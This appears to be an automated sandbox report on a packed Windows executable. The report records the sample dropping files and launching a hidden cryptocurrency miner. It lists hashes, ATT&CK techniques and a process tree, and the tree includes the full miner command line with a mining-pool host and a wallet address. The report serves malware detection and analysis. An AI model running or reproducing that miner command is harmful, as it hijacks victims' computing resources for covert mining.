73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
297s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
22-02-2024 07:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-910440534-423636034-2318342392-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4504	b2e.exe
2632	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2632	cpuminer-sse2.exe
2632	cpuminer-sse2.exe
2632	cpuminer-sse2.exe
2632	cpuminer-sse2.exe
2632	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2932-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2932 wrote to memory of 4504	2932	batexe.exe	88
PID 2932 wrote to memory of 4504	2932	batexe.exe	88
PID 2932 wrote to memory of 4504	2932	batexe.exe	88
PID 4504 wrote to memory of 2692	4504	b2e.exe	89
PID 4504 wrote to memory of 2692	4504	b2e.exe	89
PID 4504 wrote to memory of 2692	4504	b2e.exe	89
PID 2692 wrote to memory of 2632	2692	cmd.exe	92
PID 2692 wrote to memory of 2632	2692	cmd.exe	92

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2932
- C:\Users\Admin\AppData\Local\Temp\591C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\591C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\591C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5B8D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\591C.tmp\b2e.exe

Filesize
3.2MB

MD5
a5bff2f3815f72c0780d1fc9e6bdcd5c

SHA1
79b7598d5504bf1de4c9b6869b3d044885b7885f

SHA256
f21d2adfbbda006f061d23bf1f99f20271a26845c7d61462cc0b08c3168d1d51

SHA512
5e4d59c3343754a8ead6588ceda499c9d375e9c653b779437334fd9249d0b81a0e46b04f154bcf7f1033381492ce7f70cdcc3016a4c7724f7c089deba78849f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\591C.tmp\b2e.exe

Filesize
1.4MB

MD5
8d27090f74cd16e974fb892f39173888

SHA1
cfd25f4ebe133a9568583ec1d65761bf1eac33d7

SHA256
3b25767d8c3b15807b5bafc2e9e1cf38758aa92f9cf2203e12e8f0b3d470120d

SHA512
b1b682e721f9bcc8b62e2f5c41b2d3c50d62e3ce7ec1bb6414e2b1e4e7d5afd831fc3bc614d2536bb511307f4e1e1913f676ecd858a4c0c7beece4e82d149f7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\591C.tmp\b2e.exe

Filesize
1.3MB

MD5
960649df657c687533c77b61bc4c2be7

SHA1
cbd7ffd0c4b7babf947e69391b1131f6eb86887d

SHA256
ceca10fc12b7a964ff27bb27f60cd46b7a40ec91fdc5b3efe85152d9647e1851

SHA512
bf3cca7c5d03aeb37b07316368cb03d8e472a3768d03317847fe9d8b749f51e9c950e6f33caf338977d63da26aac8bcacd291ebc990754a5aadc98c57ca5300d

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B8D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
248KB

MD5
e2130d57d5372f5a4203ae37d55d4ab4

SHA1
dda23b675fde8ce00609b5c21d30875a71844270

SHA256
9cabc45eb0a4b14529978a78e1ae7bab11dc21fb95247354b906f32ee741cab6

SHA512
10464b9e96f9fd31d19fd7e8cffac8fde69a3e0de07875f8eba4beff0493562eee39569fc50cf08ad45ab7ce68bb23315d4765de964732544380f69ebcc7da06

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
254KB

MD5
69cba3d420f95ff1fa50b460b1feab08

SHA1
e7b81d7d0149a6087a5cf62c5492b4e93b97f2ab

SHA256
f2b85448039b18fec27050aa8f83afd2560cbbe1c4e574eef8f087e4a44a049e

SHA512
809ba0de9a8f38257015db9e68696945056ae7f77e1df2c2f177d03c84e4c550c6ae1cbccbc8b5ca742590d785243fc1b1f722f08766152d1530a9f1b5a56a15

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
283KB

MD5
49fb56b1e13abad75ff01a6bba134589

SHA1
a58298886fe6e485459e76337158fe993b02e660

SHA256
d47cf2e743950bf9e0bc62df6c3b8bd99cace97e7ed9c77ddf8fad6c982ee51a

SHA512
2e9787204561cf841242b93bcba843c7cfa636acc3c77f60b19cd34e8bdff61682476bd7ac4b76d86c66339813a51480587c07d2c0c75f0d74bf124dc94bea3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
342KB

MD5
5c9f355aa61e5857cf3e843d48d8b8a3

SHA1
d2b3aca965625d259db72f02a8990633b3b3283d

SHA256
b2ff7ed8ee84ffac57b6c0b607a32b65e1c68dd69c352e557f124ddb6cd39845

SHA512
e9d559ed0fb20e202c532c30e69ef82a6ffef52643c8efd953400de76ac54a0b295c72cf2569b1afee8ec4107477af409be4de62f61cd5239df710adb40bcb83

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
233KB

MD5
4ea0a43078b80efbbd665dab8f154c12

SHA1
bd410c3d972711291af034b3427d616bb4225a64

SHA256
49000c87dd6bd2504e4c7f3e805f6938bb203af7f9793be5a62431da97b7d207

SHA512
5fdf7c35be959f65c097fca471de615f3f80b97a94ffd3e4646e8d4a8f0ba5fdf2238cc365e80221d3bad1419caccd88cd5c9f31cf03e155a06120ce98630c92

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
444KB

MD5
d60e5b56eb15bf5b7fc056f2c9711b77

SHA1
382f2035fed876d6b1a046f707877a8a62f2962d

SHA256
176224f598609596b75eeccfbdf080dda446b314114dfa451f60eb9f90e404c3

SHA512
12ac42fa0423e575055c5b05fac427b751a77909668c24ca902d6de3a53b59ac34b227949a577f6f04f4d555961a9987011194401e5cb3f367d7512a30f90728

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
310KB

MD5
1365811b839d21e9ba373d31256a74f1

SHA1
6dfe5d01ac65343d5764155c1ddea5cfff5eacb9

SHA256
b44aa0bd6fd811b6be6728dee696a13cb250fa0186de69e956ec431d582d7b2b

SHA512
9cb7d8ae273ba766a0a6f40615e76965364eda88551f98f691d3aefb81960a77cefb5cb2c8b6f388aca3d77888003c7efd60bc64462acba405fd7846d918697e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
298KB

MD5
9c7cf351be4de4992f71db2693e1d05b

SHA1
951c50b34f3968b149f4a50ec643106f518e08d5

SHA256
75b86a9a90ce9fc63830ee1192b6fefb05346ed76a398cfd1c61636a47a38155

SHA512
6a96ed250ca09ae8579bc1c47a3b7c3bab718e60a2c81ca6ec00dc05e3f9f6ce9a10006057cda2c34745c84bb6cee2c3c616b34b9ddd7c878a8b67cb5186b57b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
223KB

MD5
33bf0f6fe32f7ac1771cba072ac988c0

SHA1
eb161528cce63314ef4aa5b13f0959d39d6e73a5

SHA256
b23a7aa8685350589fe7f8b8bcf7bbeb394c1c21e770fcb71ebe9b3d501ef907

SHA512
57eba82355a5ebc4d23f3be7804ee9eae9fe5611d2780f4aa53bcd242deaa3f38c556dcfd2a30e94fd0ced961d5f6bad55c1caac0122cf9288360c9593b7a2fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
338KB

MD5
bf2e06db53da54bd1e27baf739675b0d

SHA1
a6f466aa386f0c6836a51d9393488d3b804a855a

SHA256
a4b3a860353b9569f6b0e6dffab0fc5633ba4de9ffeb77fbf894286b6c09b0d5

SHA512
9788fbe8ae0f46b0926343315497f3a1e4327388d29b8b16ec85a73fe3ce7fffa26b1cfee6374a26162d6b9377374e7b1733860e2831a66b8f449bea50c3556a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
359KB

MD5
8c710f4dfa3762311b0d391934167a6f

SHA1
85e26216dac4d4ee5f14454290f7ec4ec2323d13

SHA256
7c54fe7b9665155be1d8c4e65635e61ac520acce645e839d269d06a241404f1e

SHA512
8b2e33d74f75c52cf54e658f53e384821795885743ba584859a610f3a9ec18898f1d8a2bbb19d93cf276a5b4a62f789953ef3f4846537082db3ba43de3f2bf6e

Download Submit
memory/2632-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2632-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2632-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2632-46-0x0000000054F10000-0x0000000054FA8000-memory.dmp

Filesize
608KB

Download
memory/2632-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2632-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2632-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2632-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2632-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2632-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2632-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2632-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2632-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2632-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2632-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2932-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4504-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4504-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download